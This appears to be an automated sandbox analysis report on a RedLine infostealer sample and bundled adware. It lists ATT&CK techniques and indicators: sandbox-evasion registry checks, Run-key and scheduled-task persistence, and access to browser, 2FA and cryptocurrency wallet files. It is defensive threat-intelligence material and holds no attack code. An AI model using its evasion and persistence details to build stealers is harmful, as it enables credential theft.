redline | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2314370.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2314370.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	6686198.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	6686198.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2103.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2103.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Sygaluvuzhe.exe

Loads dropped DLL 64 IoCs

pid	Process
3904	setup_install.exe
3904	setup_install.exe
3904	setup_install.exe
3904	setup_install.exe
3904	setup_install.exe
3904	setup_install.exe
1104	Fri157e25afd971.tmp
4992	setup_2.tmp
4884	setup_2.tmp
6048	rundll32.exe
5292	rundll32.exe
6988	installer.exe
6988	installer.exe
6988	installer.exe
5412	MsiExec.exe
5412	MsiExec.exe
1624	Fri1544861ac3fe6a.exe
1624	Fri1544861ac3fe6a.exe
6336	rundll32.exe
6896	MsiExec.exe
6896	MsiExec.exe
6896	MsiExec.exe
6896	MsiExec.exe
6896	MsiExec.exe
6896	44D9.exe
6896	44D9.exe
6896	44D9.exe
6896	44D9.exe
6896	44D9.exe
6988	installer.exe
6896	44D9.exe
6896	44D9.exe
3940	MsiExec.exe
3940	MsiExec.exe
3940	MsiExec.exe
3940	MsiExec.exe
3940	MsiExec.exe
3940	MsiExec.exe
3940	MsiExec.exe
6896	44D9.exe
424	29D.exe
424	29D.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4176	search_awesome.exe
4076	FreeVPN.exe
4076	FreeVPN.exe
4068	FreeVPN.exe
4068	FreeVPN.exe
2036	FreeVPN.exe
2036	FreeVPN.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral9/files/0x000400000001ab6b-259.dat	themida
behavioral9/memory/4976-304-0x0000000000D00000-0x0000000000D01000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	5847084.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Defender\\Nuhityceqae.exe\""	zab2our.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2103.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2314370.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	6686198.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\T:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com
127	ip-api.com
896	ip-api.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 43202AAF3B7B9EBC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
4976	2314370.exe
4512	6686198.exe
6368	2103.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2684 set thread context of 5588	2684	svchost.exe	159
PID 5980 set thread context of 5552	5980	services64.exe	218

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\bin\plds4.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\OMD20Sg9RTs7sUORCEN-7Y4P5ICox8Kq3LLUNMylGO4.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\loading.gif	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\us_flag.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\FreeVPN\settings.json	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\index.html	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\w3OQMu9Ox3bN1d9i3mbh2xTbgVql8nDJpwnrE27mub0.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\css\index.css	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\oxrPYIm05JrY_0rFIEQ_oRJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\lang.png	FreeVPN.exe
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\Search Awesome\FF\bin\nssutil3.dll	search_awesome.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\bin\softokn3.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\H2j4_4xA-HIuoc_A3BIwVBJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn1.png	FreeVPN.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\Release.7z	search_awesome.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\autoconfig.js	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\4z2U46_RRLOfkoHsWJG3vxJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\main_menus.html	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\FreeVPN\libcurl.dll	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwiYE0-AqJ3nfInTTiDXDjU4.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwmo_sUJ8uO4YLWRInS22T3Y.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\close.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\FreeVPN\Release.7z	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\FreeVPN\libeay32.dll	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\softokn3.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\EtSRPnpS3nIR-zKYiR-sDBJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\frpc.exe	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\OMD20Sg9RTs7sUORCEN-7TUj_cnvWIuuBMVgbX098Mw.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\X_EdMnknKUltk57alVVbVxJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\question2.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\bin\certutil.exe	search_awesome.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\plc4.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\T0N0BD55aMuIijZeoZ4TJBTbgVql8nDJpwnrE27mub0.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\js\jquery.min.js	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\default.ico	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\IiMFELcoPB-OzGzq14k4ehJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\ohKfORL_YnhBMzkCPoIqwjTOQ_MqJVwkKsUn0wKzc2I.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\closed_selector.png	FreeVPN.exe
File opened for modification	\??\c:\program files (x86)\freevpn\default.ico	Process not Found
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\fontawesome-webfont.svg	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\js\slide-menu.js	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\uninstall.exe	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\bin\nssdbm3.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\_aijTyevf54tkVDLy-dlnFtXRa8TVwTICgirnJhmVJw.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\Search Awesome\FF\bin\COPYING	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\css\ubuntu-font.css	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\MLKvhAbswThSVACnSTWCpxJtnKITppOI_IvcXXDNrsc.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\enable_vpn.gif	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\bin\nssutil3.dll	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\fonts\7Auwp_0qiz-afT3GLRrX.woff2	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\heart_img.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\Search Awesome\FF\certificate.cer	search_awesome.exe
File opened for modification	C:\Program Files (x86)\FreeVPN\log	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\background_off.png	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\menu_btn2.png	FreeVPN.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files\Mozilla Firefox\firefox.cfg	setup.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\css\keen_main.css	FreeVPN.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\brave-logotype-full-color-small.png	FreeVPN.exe
File created	C:\Program Files (x86)\Search Awesome\Release.7z	search_awesome.exe
File created	C:\Program Files (x86)\Search Awesome\FF\db\empty\secmod.db	search_awesome.exe
File created	C:\Program Files (x86)\FreeVPN\html\html\images\warning_icon.PNG	FreeVPN.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI4E76.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5DF6.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI4210.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4F62.tmp	msiexec.exe
File created	C:\Windows\Installer\f753cbf.msi	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI5785.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI40F3.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI3F4C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI502E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI593C.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4EF4.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\f753cbc.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5B92.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI4162.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI41D0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4240.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI5B42.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5C00.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Installer\MSI4132.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\Installer\f753cbc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI5214.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5282.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5A56.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5AF3.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 29 IoCs

pid	pid_target	Process	procid_target
4276	4404	WerFault.exe	107
4988	1624	WerFault.exe	89
5148	4560	WerFault.exe	102
5256	1624	WerFault.exe	89
5480	1624	WerFault.exe	89
5504	4560	WerFault.exe	102
5808	1624	WerFault.exe	89
5840	4560	WerFault.exe	102
6088	1624	WerFault.exe	89
4956	4560	WerFault.exe	102
5460	4560	WerFault.exe	102
5456	1624	WerFault.exe	89
5552	1624	WerFault.exe	89
2784	4560	WerFault.exe	102
5844	1624	WerFault.exe	89
424	1624	WerFault.exe	89
6664	1624	WerFault.exe	89
7020	1624	WerFault.exe	89
6240	1624	WerFault.exe	89
6756	1624	WerFault.exe	89
6948	1624	WerFault.exe	89
6380	1624	WerFault.exe	89
7104	6652	WerFault.exe	173
6840	6652	WerFault.exe	173
2788	6652	WerFault.exe	173
6500	6652	WerFault.exe	173
6436	1624	WerFault.exe	89
6844	6652	WerFault.exe	173
4940	4324	WerFault.exe	99

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ejsdgsb

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5672	schtasks.exe
5712	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
6208	taskkill.exe
4712	taskkill.exe
6412	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 27 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
